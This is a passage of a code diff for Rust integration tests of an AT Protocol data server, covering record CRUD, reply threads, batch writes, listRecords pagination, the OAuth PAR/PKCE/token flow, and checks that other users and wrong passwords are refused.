assert_eq!(get_res.status(), StatusCode::OK);
168
let get_body: Value = get_res.json().await.unwrap();
169
assert_eq!(get_body["value"]["displayName"], "Test User");
170
+
assert!(get_body["value"]["avatar"]["ref"]["$link"].is_string());
171
let update_payload = json!({
172
"repo": did,
173
"collection": "app.bsky.actor.profile",
174
"rkey": "self",
175
+
"record": { "$type": "app.bsky.actor.profile", "displayName": "Updated User", "description": "Profile updated" },
176
"swapRecord": initial_cid
177
});
178
let update_res = client
179
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
180
.bearer_auth(&jwt)
181
.json(&update_payload)
182
.send()
183
.await
184
.expect("Failed to update profile");
185
+
assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile");
186
let get_updated_res = client
187
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
188
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
189
.send()
190
.await
191
.expect("Failed to get updated profile");
···
198
let client = client();
199
let (alice_did, alice_jwt) = setup_new_user("alice-thread").await;
200
let (bob_did, bob_jwt) = setup_new_user("bob-thread").await;
201
+
let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await;
202
tokio::time::sleep(Duration::from_millis(100)).await;
203
let reply_collection = "app.bsky.feed.post";
204
let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis());
205
let reply_payload = json!({
206
"repo": bob_did,
207
"collection": reply_collection,
···
209
"record": {
210
"$type": reply_collection,
211
"text": "This is Bob's reply to Alice",
212
+
"createdAt": Utc::now().to_rfc3339(),
213
"reply": {
214
+
"root": { "uri": root_uri, "cid": root_cid },
215
+
"parent": { "uri": root_uri, "cid": root_cid }
216
}
217
}
218
});
219
let reply_res = client
220
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
221
.bearer_auth(&bob_jwt)
222
.json(&reply_payload)
223
.send()
···
228
let reply_uri = reply_body["uri"].as_str().unwrap();
229
let reply_cid = reply_body["cid"].as_str().unwrap();
230
let get_reply_res = client
231
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
232
+
.query(&[("repo", bob_did.as_str()), ("collection", reply_collection), ("rkey", reply_rkey.as_str())])
233
.send()
234
.await
235
.expect("Failed to get reply");
236
assert_eq!(get_reply_res.status(), StatusCode::OK);
237
let reply_record: Value = get_reply_res.json().await.unwrap();
238
assert_eq!(reply_record["value"]["reply"]["root"]["uri"], root_uri);
239
tokio::time::sleep(Duration::from_millis(100)).await;
240
let nested_reply_rkey = format!("e2e_nested_reply_{}", Utc::now().timestamp_millis());
241
let nested_payload = json!({
···
247
"text": "Alice replies to Bob's reply",
248
"createdAt": Utc::now().to_rfc3339(),
249
"reply": {
250
+
"root": { "uri": root_uri, "cid": root_cid },
251
+
"parent": { "uri": reply_uri, "cid": reply_cid }
252
}
253
}
254
});
255
let nested_res = client
256
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
257
.bearer_auth(&alice_jwt)
258
.json(&nested_payload)
259
.send()
260
.await
261
.expect("Failed to create nested reply");
262
+
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
263
}
264
265
#[tokio::test]
266
+
async fn test_authorization_protects_repos() {
267
let client = client();
268
+
let (alice_did, alice_jwt) = setup_new_user("alice-auth").await;
269
let (_bob_did, bob_jwt) = setup_new_user("bob-auth").await;
270
+
let (post_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's post").await;
271
+
let post_rkey = post_uri.split('/').last().unwrap();
272
let post_payload = json!({
273
"repo": alice_did,
274
"collection": "app.bsky.feed.post",
275
"rkey": "unauthorized-post",
276
+
"record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() }
277
});
278
+
let write_res = client
279
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
280
.bearer_auth(&bob_jwt)
281
.json(&post_payload)
282
.send()
283
.await
284
.expect("Failed to send request");
285
+
assert!(write_res.status() == StatusCode::FORBIDDEN || write_res.status() == StatusCode::UNAUTHORIZED,
286
+
"Expected 403/401 for writing to another user's repo, got {}", write_res.status());
287
+
let delete_payload = json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey });
288
+
let delete_res = client
289
+
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await))
290
.bearer_auth(&bob_jwt)
291
.json(&delete_payload)
292
.send()
293
.await
294
.expect("Failed to send request");
295
+
assert!(delete_res.status() == StatusCode::FORBIDDEN || delete_res.status() == StatusCode::UNAUTHORIZED,
296
+
"Expected 403/401 for deleting another user's record, got {}", delete_res.status());
297
let get_res = client
298
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
299
+
.query(&[("repo", alice_did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", post_rkey)])
300
.send()
301
.await
302
.expect("Failed to verify record exists");
303
+
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
304
}
305
306
#[tokio::test]
307
+
async fn test_apply_writes_batch() {
308
let client = client();
309
let (did, jwt) = setup_new_user("apply-writes-batch").await;
310
let now = Utc::now().to_rfc3339();
311
let writes_payload = json!({
312
"repo": did,
313
"writes": [
314
+
{ "$type": "com.atproto.repo.applyWrites#create", "collection": "app.bsky.feed.post", "rkey": "batch-post-1", "value": { "$type": "app.bsky.feed.post", "text": "First batch post", "createdAt": now } },
315
+
{ "$type": "com.atproto.repo.applyWrites#create", "collection": "app.bsky.feed.post", "rkey": "batch-post-2", "value": { "$type": "app.bsky.feed.post", "text": "Second batch post", "createdAt": now } },
316
+
{ "$type": "com.atproto.repo.applyWrites#create", "collection": "app.bsky.actor.profile", "rkey": "self", "value": { "$type": "app.bsky.actor.profile", "displayName": "Batch User" } }
317
]
318
});
319
let apply_res = client
320
+
.post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await))
321
.bearer_auth(&jwt)
322
.json(&writes_payload)
323
.send()
···
325
.expect("Failed to apply writes");
326
assert_eq!(apply_res.status(), StatusCode::OK);
327
let get_post1 = client
328
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
329
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")])
330
+
.send().await.expect("Failed to get post 1");
331
assert_eq!(get_post1.status(), StatusCode::OK);
332
let post1_body: Value = get_post1.json().await.unwrap();
333
assert_eq!(post1_body["value"]["text"], "First batch post");
334
let get_post2 = client
335
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
336
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-2")])
337
+
.send().await.expect("Failed to get post 2");
338
assert_eq!(get_post2.status(), StatusCode::OK);
339
let get_profile = client
340
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
341
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
342
+
.send().await.expect("Failed to get profile");
343
let profile_body: Value = get_profile.json().await.unwrap();
344
assert_eq!(profile_body["value"]["displayName"], "Batch User");
345
let update_writes = json!({
346
"repo": did,
347
"writes": [
348
+
{ "$type": "com.atproto.repo.applyWrites#update", "collection": "app.bsky.actor.profile", "rkey": "self", "value": { "$type": "app.bsky.actor.profile", "displayName": "Updated Batch User" } },
349
+
{ "$type": "com.atproto.repo.applyWrites#delete", "collection": "app.bsky.feed.post", "rkey": "batch-post-1" }
350
]
351
});
352
let update_res = client
353
+
.post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await))
354
.bearer_auth(&jwt)
355
.json(&update_writes)
356
.send()
···
358
.expect("Failed to apply update writes");
359
assert_eq!(update_res.status(), StatusCode::OK);
360
let get_updated_profile = client
361
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
362
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
363
+
.send().await.expect("Failed to get updated profile");
364
let updated_profile: Value = get_updated_profile.json().await.unwrap();
365
+
assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User");
366
let get_deleted_post = client
367
+
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
368
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")])
369
+
.send().await.expect("Failed to check deleted post");
370
+
assert_eq!(get_deleted_post.status(), StatusCode::NOT_FOUND, "Batch-deleted post should be gone");
371
}
372
373
+
async fn create_post_with_rkey(client: &reqwest::Client, did: &str, jwt: &str, rkey: &str, text: &str) -> (String, String) {
374
let payload = json!({
375
+
"repo": did, "collection": "app.bsky.feed.post", "rkey": rkey,
376
+
"record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() }
377
});
378
let res = client
379
+
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
380
.bearer_auth(jwt)
381
.json(&payload)
382
.send()
···
384
.expect("Failed to create record");
385
assert_eq!(res.status(), StatusCode::OK);
386
let body: Value = res.json().await.unwrap();
387
+
(body["uri"].as_str().unwrap().to_string(), body["cid"].as_str().unwrap().to_string())
388
}
389
390
#[tokio::test]
391
+
async fn test_list_records_comprehensive() {
392
let client = client();
393
+
let (did, jwt) = setup_new_user("list-records-test").await;
394
for i in 0..5 {
395
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
396
tokio::time::sleep(Duration::from_millis(50)).await;
397
}
398
let res = client
399
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
400
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
401
+
.send().await.expect("Failed to list records");
402
assert_eq!(res.status(), StatusCode::OK);
403
let body: Value = res.json().await.unwrap();
404
let records = body["records"].as_array().unwrap();
405
+
assert_eq!(records.len(), 5);
406
+
let rkeys: Vec<&str> = records.iter().map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect();
407
+
assert_eq!(rkeys, vec!["post04", "post03", "post02", "post01", "post00"], "Default order should be DESC");
408
for record in records {
409
+
assert!(record["uri"].is_string());
410
+
assert!(record["cid"].is_string());
411
+
assert!(record["cid"].as_str().unwrap().starts_with("bafy"));
412
+
assert!(record["value"].is_object());
413
}
414
+
let rev_res = client
415
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
416
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("reverse", "true")])
417
+
.send().await.expect("Failed to list records reverse");
418
+
let rev_body: Value = rev_res.json().await.unwrap();
419
+
let rev_rkeys: Vec<&str> = rev_body["records"].as_array().unwrap().iter()
420
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect();
421
+
assert_eq!(rev_rkeys, vec!["post00", "post01", "post02", "post03", "post04"], "reverse=true should give ASC");
422
+
let page1 = client
423
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
424
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2")])
425
+
.send().await.expect("Failed to list page 1");
426
+
let page1_body: Value = page1.json().await.unwrap();
427
+
let page1_records = page1_body["records"].as_array().unwrap();
428
+
assert_eq!(page1_records.len(), 2);
429
+
let cursor = page1_body["cursor"].as_str().expect("Should have cursor");
430
+
let page2 = client
431
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
432
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2"), ("cursor", cursor)])
433
+
.send().await.expect("Failed to list page 2");
434
+
let page2_body: Value = page2.json().await.unwrap();
435
+
let page2_records = page2_body["records"].as_array().unwrap();
436
+
assert_eq!(page2_records.len(), 2);
437
+
let all_uris: Vec<&str> = page1_records.iter().chain(page2_records.iter())
438
+
.map(|r| r["uri"].as_str().unwrap()).collect();
439
+
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
440
+
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
441
+
let range_res = client
442
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
443
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"),
444
+
("rkeyStart", "post01"), ("rkeyEnd", "post03"), ("reverse", "true")])
445
+
.send().await.expect("Failed to list range");
446
+
let range_body: Value = range_res.json().await.unwrap();
447
+
let range_rkeys: Vec<&str> = range_body["records"].as_array().unwrap().iter()
448
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect();
449
+
for rkey in &range_rkeys {
450
+
assert!(*rkey >= "post01" && *rkey <= "post03", "Range should be inclusive");
451
}
452
+
let limit_res = client
453
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
454
+
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "1000")])
455
+
.send().await.expect("Failed with high limit");
456
+
let limit_body: Value = limit_res.json().await.unwrap();
457
+
assert!(limit_body["records"].as_array().unwrap().len() <= 100, "Limit should be clamped to max 100");
458
+
let not_found_res = client
459
+
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
460
+
.query(&[("repo", "did:plc:nonexistent12345"), ("collection", "app.bsky.feed.post")])
461
+
.send().await.expect("Failed with nonexistent repo");
462
+
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
463
}
+243
-1299
tests/oauth.rs
+243
-1299
tests/oauth.rs
···
2
mod helpers;
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
use chrono::Utc;
5
-
use common::{base_url, client, create_account_and_login};
6
use reqwest::{StatusCode, redirect};
7
use serde_json::{Value, json};
8
use sha2::{Digest, Sha256};
···
10
use wiremock::{Mock, MockServer, ResponseTemplate};
11
12
fn no_redirect_client() -> reqwest::Client {
13
-
reqwest::Client::builder()
14
-
.redirect(redirect::Policy::none())
15
-
.build()
16
-
.unwrap()
17
}
18
19
fn generate_pkce() -> (String, String) {
···
21
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
22
let mut hasher = Sha256::new();
23
hasher.update(code_verifier.as_bytes());
24
-
let hash = hasher.finalize();
25
-
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
26
(code_verifier, code_challenge)
27
}
28
···
45
.await;
46
mock_server
47
}
48
-
#[allow(dead_code)]
49
-
async fn setup_mock_dpop_client(redirect_uri: &str) -> MockServer {
50
-
let mock_server = MockServer::start().await;
51
-
let client_id = mock_server.uri();
52
-
let metadata = json!({
53
-
"client_id": client_id,
54
-
"client_name": "DPoP Test Client",
55
-
"redirect_uris": [redirect_uri],
56
-
"grant_types": ["authorization_code", "refresh_token"],
57
-
"response_types": ["code"],
58
-
"token_endpoint_auth_method": "none",
59
-
"dpop_bound_access_tokens": true
60
-
});
61
-
Mock::given(method("GET"))
62
-
.and(path("/"))
63
-
.respond_with(ResponseTemplate::new(200).set_body_json(metadata))
64
-
.mount(&mock_server)
65
-
.await;
66
-
mock_server
67
-
}
68
#[tokio::test]
69
-
async fn test_oauth_protected_resource_metadata() {
70
let url = base_url().await;
71
let client = client();
72
-
let res = client
73
-
.get(format!("{}/.well-known/oauth-protected-resource", url))
74
-
.send()
75
-
.await
76
-
.expect("Failed to fetch protected resource metadata");
77
-
assert_eq!(res.status(), StatusCode::OK);
78
-
let body: Value = res.json().await.expect("Invalid JSON");
79
-
assert!(body["resource"].is_string());
80
-
assert!(body["authorization_servers"].is_array());
81
-
assert!(body["bearer_methods_supported"].is_array());
82
-
let bearer_methods = body["bearer_methods_supported"].as_array().unwrap();
83
-
assert!(bearer_methods.contains(&json!("header")));
84
}
85
#[tokio::test]
86
-
async fn test_oauth_authorization_server_metadata() {
87
-
let url = base_url().await;
88
-
let client = client();
89
-
let res = client
90
-
.get(format!("{}/.well-known/oauth-authorization-server", url))
91
-
.send()
92
-
.await
93
-
.expect("Failed to fetch authorization server metadata");
94
-
assert_eq!(res.status(), StatusCode::OK);
95
-
let body: Value = res.json().await.expect("Invalid JSON");
96
-
assert!(body["issuer"].is_string());
97
-
assert!(body["authorization_endpoint"].is_string());
98
-
assert!(body["token_endpoint"].is_string());
99
-
assert!(body["jwks_uri"].is_string());
100
-
let response_types = body["response_types_supported"].as_array().unwrap();
101
-
assert!(response_types.contains(&json!("code")));
102
-
let grant_types = body["grant_types_supported"].as_array().unwrap();
103
-
assert!(grant_types.contains(&json!("authorization_code")));
104
-
assert!(grant_types.contains(&json!("refresh_token")));
105
-
let code_challenge_methods = body["code_challenge_methods_supported"].as_array().unwrap();
106
-
assert!(code_challenge_methods.contains(&json!("S256")));
107
-
assert_eq!(body["require_pushed_authorization_requests"], json!(true));
108
-
let dpop_algs = body["dpop_signing_alg_values_supported"]
109
-
.as_array()
110
-
.unwrap();
111
-
assert!(dpop_algs.contains(&json!("ES256")));
112
-
}
113
-
#[tokio::test]
114
-
async fn test_oauth_jwks_endpoint() {
115
-
let url = base_url().await;
116
-
let client = client();
117
-
let res = client
118
-
.get(format!("{}/oauth/jwks", url))
119
-
.send()
120
-
.await
121
-
.expect("Failed to fetch JWKS");
122
-
assert_eq!(res.status(), StatusCode::OK);
123
-
let body: Value = res.json().await.expect("Invalid JSON");
124
-
assert!(body["keys"].is_array());
125
-
}
126
-
#[tokio::test]
127
-
async fn test_par_success() {
128
-
let url = base_url().await;
129
-
let client = client();
130
-
let redirect_uri = "https://example.com/callback";
131
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
132
-
let client_id = mock_client.uri();
133
-
let (_code_verifier, code_challenge) = generate_pkce();
134
-
let res = client
135
-
.post(format!("{}/oauth/par", url))
136
-
.form(&[
137
-
("response_type", "code"),
138
-
("client_id", &client_id),
139
-
("redirect_uri", redirect_uri),
140
-
("code_challenge", &code_challenge),
141
-
("code_challenge_method", "S256"),
142
-
("scope", "atproto"),
143
-
("state", "test-state-123"),
144
-
])
145
-
.send()
146
-
.await
147
-
.expect("Failed to send PAR request");
148
-
assert_eq!(
149
-
res.status(),
150
-
StatusCode::CREATED,
151
-
"PAR should succeed: {:?}",
152
-
res.text().await
153
-
);
154
-
let body: Value = client
155
-
.post(format!("{}/oauth/par", url))
156
-
.form(&[
157
-
("response_type", "code"),
158
-
("client_id", &client_id),
159
-
("redirect_uri", redirect_uri),
160
-
("code_challenge", &code_challenge),
161
-
("code_challenge_method", "S256"),
162
-
("scope", "atproto"),
163
-
("state", "test-state-123"),
164
-
])
165
-
.send()
166
-
.await
167
-
.unwrap()
168
-
.json()
169
-
.await
170
-
.expect("Invalid JSON");
171
-
assert!(body["request_uri"].is_string());
172
-
assert!(body["expires_in"].is_number());
173
-
let request_uri = body["request_uri"].as_str().unwrap();
174
-
assert!(request_uri.starts_with("urn:ietf:params:oauth:request_uri:"));
175
-
}
176
-
#[tokio::test]
177
-
async fn test_authorize_get_with_valid_request_uri() {
178
let url = base_url().await;
179
let client = client();
180
let redirect_uri = "https://example.com/callback";
···
183
let (_, code_challenge) = generate_pkce();
184
let par_res = client
185
.post(format!("{}/oauth/par", url))
186
-
.form(&[
187
-
("response_type", "code"),
188
-
("client_id", &client_id),
189
-
("redirect_uri", redirect_uri),
190
-
("code_challenge", &code_challenge),
191
-
("code_challenge_method", "S256"),
192
-
("scope", "atproto"),
193
-
("state", "test-state"),
194
-
])
195
-
.send()
196
-
.await
197
-
.expect("PAR failed");
198
-
let par_body: Value = par_res.json().await.expect("Invalid PAR JSON");
199
let request_uri = par_body["request_uri"].as_str().unwrap();
200
let auth_res = client
201
.get(format!("{}/oauth/authorize", url))
202
.header("Accept", "application/json")
203
.query(&[("request_uri", request_uri)])
204
-
.send()
205
-
.await
206
-
.expect("Authorize GET failed");
207
assert_eq!(auth_res.status(), StatusCode::OK);
208
-
let auth_body: Value = auth_res.json().await.expect("Invalid auth JSON");
209
assert_eq!(auth_body["client_id"], client_id);
210
assert_eq!(auth_body["redirect_uri"], redirect_uri);
211
assert_eq!(auth_body["scope"], "atproto");
212
-
assert_eq!(auth_body["state"], "test-state");
213
-
}
214
-
#[tokio::test]
215
-
async fn test_authorize_rejects_invalid_request_uri() {
216
-
let url = base_url().await;
217
-
let client = client();
218
-
let res = client
219
.get(format!("{}/oauth/authorize", url))
220
.header("Accept", "application/json")
221
-
.query(&[(
222
-
"request_uri",
223
-
"urn:ietf:params:oauth:request_uri:nonexistent",
224
-
)])
225
-
.send()
226
-
.await
227
-
.expect("Request failed");
228
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
229
-
let body: Value = res.json().await.expect("Invalid JSON");
230
-
assert_eq!(body["error"], "invalid_request");
231
}
232
#[tokio::test]
233
-
async fn test_authorize_requires_request_uri() {
234
-
let url = base_url().await;
235
-
let client = client();
236
-
let res = client
237
-
.get(format!("{}/oauth/authorize", url))
238
-
.send()
239
-
.await
240
-
.expect("Request failed");
241
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
242
-
}
243
-
#[tokio::test]
244
-
async fn test_full_oauth_flow_without_dpop() {
245
let url = base_url().await;
246
let http_client = client();
247
-
let (_, _user_did) = create_account_and_login(&http_client).await;
248
let ts = Utc::now().timestamp_millis();
249
let handle = format!("oauth-test-{}", ts);
250
let email = format!("oauth-test-{}@example.com", ts);
251
let password = "oauth-test-password";
252
let create_res = http_client
253
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
254
-
.json(&json!({
255
-
"handle": handle,
256
-
"email": email,
257
-
"password": password
258
-
}))
259
-
.send()
260
-
.await
261
-
.expect("Account creation failed");
262
assert_eq!(create_res.status(), StatusCode::OK);
263
let account: Value = create_res.json().await.unwrap();
264
let user_did = account["did"].as_str().unwrap();
···
269
let state = format!("state-{}", ts);
270
let par_res = http_client
271
.post(format!("{}/oauth/par", url))
272
-
.form(&[
273
-
("response_type", "code"),
274
-
("client_id", &client_id),
275
-
("redirect_uri", redirect_uri),
276
-
("code_challenge", &code_challenge),
277
-
("code_challenge_method", "S256"),
278
-
("scope", "atproto"),
279
-
("state", &state),
280
-
])
281
-
.send()
282
-
.await
283
-
.expect("PAR failed");
284
-
let par_status = par_res.status();
285
-
let par_text = par_res.text().await.unwrap_or_default();
286
-
if par_status != StatusCode::OK && par_status != StatusCode::CREATED {
287
-
panic!("PAR failed with status {}: {}", par_status, par_text);
288
-
}
289
-
let par_body: Value = serde_json::from_str(&par_text).unwrap();
290
let request_uri = par_body["request_uri"].as_str().unwrap();
291
let auth_client = no_redirect_client();
292
let auth_res = auth_client
293
.post(format!("{}/oauth/authorize", url))
294
-
.form(&[
295
-
("request_uri", request_uri),
296
-
("username", &handle),
297
-
("password", password),
298
-
("remember_device", "false"),
299
-
])
300
-
.send()
301
-
.await
302
-
.expect("Authorize POST failed");
303
-
let auth_status = auth_res.status();
304
-
if auth_status != StatusCode::TEMPORARY_REDIRECT
305
-
&& auth_status != StatusCode::SEE_OTHER
306
-
&& auth_status != StatusCode::FOUND
307
-
{
308
-
let auth_text = auth_res.text().await.unwrap_or_default();
309
-
panic!("Expected redirect, got {}: {}", auth_status, auth_text);
310
-
}
311
-
let location = auth_res
312
-
.headers()
313
-
.get("location")
314
-
.expect("No Location header")
315
-
.to_str()
316
-
.unwrap();
317
-
assert!(
318
-
location.starts_with(redirect_uri),
319
-
"Redirect to wrong URI: {}",
320
-
location
321
-
);
322
-
assert!(
323
-
location.contains("code="),
324
-
"No code in redirect: {}",
325
-
location
326
-
);
327
-
assert!(
328
-
location.contains(&format!("state={}", state)),
329
-
"Wrong state in redirect"
330
-
);
331
-
let code = location
332
-
.split("code=")
333
-
.nth(1)
334
-
.unwrap()
335
-
.split('&')
336
-
.next()
337
-
.unwrap();
338
let token_res = http_client
339
.post(format!("{}/oauth/token", url))
340
-
.form(&[
341
-
("grant_type", "authorization_code"),
342
-
("code", code),
343
-
("redirect_uri", redirect_uri),
344
-
("code_verifier", &code_verifier),
345
-
("client_id", &client_id),
346
-
])
347
-
.send()
348
-
.await
349
-
.expect("Token request failed");
350
-
let token_status = token_res.status();
351
-
let token_text = token_res.text().await.unwrap_or_default();
352
-
if token_status != StatusCode::OK {
353
-
panic!(
354
-
"Token request failed with status {}: {}",
355
-
token_status, token_text
356
-
);
357
-
}
358
-
let token_body: Value = serde_json::from_str(&token_text).unwrap();
359
assert!(token_body["access_token"].is_string());
360
assert!(token_body["refresh_token"].is_string());
361
assert_eq!(token_body["token_type"], "Bearer");
362
assert!(token_body["expires_in"].is_number());
363
assert_eq!(token_body["sub"], user_did);
364
-
}
365
-
#[tokio::test]
366
-
async fn test_token_refresh_flow() {
367
-
let url = base_url().await;
368
-
let http_client = client();
369
-
let ts = Utc::now().timestamp_millis();
370
-
let handle = format!("refresh-test-{}", ts);
371
-
let email = format!("refresh-test-{}@example.com", ts);
372
-
let password = "refresh-test-password";
373
-
http_client
374
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
375
-
.json(&json!({
376
-
"handle": handle,
377
-
"email": email,
378
-
"password": password
379
-
}))
380
-
.send()
381
-
.await
382
-
.expect("Account creation failed");
383
-
let redirect_uri = "https://example.com/refresh-callback";
384
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
385
-
let client_id = mock_client.uri();
386
-
let (code_verifier, code_challenge) = generate_pkce();
387
-
let par_body: Value = http_client
388
-
.post(format!("{}/oauth/par", url))
389
-
.form(&[
390
-
("response_type", "code"),
391
-
("client_id", &client_id),
392
-
("redirect_uri", redirect_uri),
393
-
("code_challenge", &code_challenge),
394
-
("code_challenge_method", "S256"),
395
-
])
396
-
.send()
397
-
.await
398
-
.unwrap()
399
-
.json()
400
-
.await
401
-
.unwrap();
402
-
let request_uri = par_body["request_uri"].as_str().unwrap();
403
-
let auth_client = no_redirect_client();
404
-
let auth_res = auth_client
405
-
.post(format!("{}/oauth/authorize", url))
406
-
.form(&[
407
-
("request_uri", request_uri),
408
-
("username", &handle),
409
-
("password", password),
410
-
("remember_device", "false"),
411
-
])
412
-
.send()
413
-
.await
414
-
.unwrap();
415
-
let location = auth_res
416
-
.headers()
417
-
.get("location")
418
-
.unwrap()
419
-
.to_str()
420
-
.unwrap();
421
-
let code = location
422
-
.split("code=")
423
-
.nth(1)
424
-
.unwrap()
425
-
.split('&')
426
-
.next()
427
-
.unwrap();
428
-
let token_body: Value = http_client
429
-
.post(format!("{}/oauth/token", url))
430
-
.form(&[
431
-
("grant_type", "authorization_code"),
432
-
("code", code),
433
-
("redirect_uri", redirect_uri),
434
-
("code_verifier", &code_verifier),
435
-
("client_id", &client_id),
436
-
])
437
-
.send()
438
-
.await
439
-
.unwrap()
440
-
.json()
441
-
.await
442
-
.unwrap();
443
let refresh_token = token_body["refresh_token"].as_str().unwrap();
444
-
let original_access_token = token_body["access_token"].as_str().unwrap();
445
let refresh_res = http_client
446
.post(format!("{}/oauth/token", url))
447
-
.form(&[
448
-
("grant_type", "refresh_token"),
449
-
("refresh_token", refresh_token),
450
-
("client_id", &client_id),
451
-
])
452
-
.send()
453
-
.await
454
-
.expect("Refresh request failed");
455
assert_eq!(refresh_res.status(), StatusCode::OK);
456
let refresh_body: Value = refresh_res.json().await.unwrap();
457
-
assert!(refresh_body["access_token"].is_string());
458
-
assert!(refresh_body["refresh_token"].is_string());
459
-
let new_access_token = refresh_body["access_token"].as_str().unwrap();
460
-
let new_refresh_token = refresh_body["refresh_token"].as_str().unwrap();
461
-
assert_ne!(
462
-
new_access_token, original_access_token,
463
-
"Access token should rotate"
464
-
);
465
-
assert_ne!(
466
-
new_refresh_token, refresh_token,
467
-
"Refresh token should rotate"
468
-
);
469
}
470
#[tokio::test]
471
-
async fn test_wrong_credentials_denied() {
472
let url = base_url().await;
473
let http_client = client();
474
let ts = Utc::now().timestamp_millis();
475
let handle = format!("wrong-creds-{}", ts);
476
let email = format!("wrong-creds-{}@example.com", ts);
477
-
let password = "correct-password";
478
-
http_client
479
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
480
-
.json(&json!({
481
-
"handle": handle,
482
-
"email": email,
483
-
"password": password
484
-
}))
485
-
.send()
486
-
.await
487
-
.unwrap();
488
-
let redirect_uri = "https://example.com/wrong-creds-callback";
489
let mock_client = setup_mock_client_metadata(redirect_uri).await;
490
let client_id = mock_client.uri();
491
let (_, code_challenge) = generate_pkce();
492
let par_body: Value = http_client
493
.post(format!("{}/oauth/par", url))
494
-
.form(&[
495
-
("response_type", "code"),
496
-
("client_id", &client_id),
497
-
("redirect_uri", redirect_uri),
498
-
("code_challenge", &code_challenge),
499
-
("code_challenge_method", "S256"),
500
-
])
501
-
.send()
502
-
.await
503
-
.unwrap()
504
-
.json()
505
-
.await
506
-
.unwrap();
507
let request_uri = par_body["request_uri"].as_str().unwrap();
508
let auth_res = http_client
509
.post(format!("{}/oauth/authorize", url))
510
.header("Accept", "application/json")
511
-
.form(&[
512
-
("request_uri", request_uri),
513
-
("username", &handle),
514
-
("password", "wrong-password"),
515
-
("remember_device", "false"),
516
-
])
517
-
.send()
518
-
.await
519
-
.unwrap();
520
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN);
521
let error_body: Value = auth_res.json().await.unwrap();
522
assert_eq!(error_body["error"], "access_denied");
523
-
}
524
-
#[tokio::test]
525
-
async fn test_token_revocation() {
526
-
let url = base_url().await;
527
-
let http_client = client();
528
-
let ts = Utc::now().timestamp_millis();
529
-
let handle = format!("revoke-test-{}", ts);
530
-
let email = format!("revoke-test-{}@example.com", ts);
531
-
let password = "revoke-test-password";
532
-
http_client
533
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
534
-
.json(&json!({
535
-
"handle": handle,
536
-
"email": email,
537
-
"password": password
538
-
}))
539
-
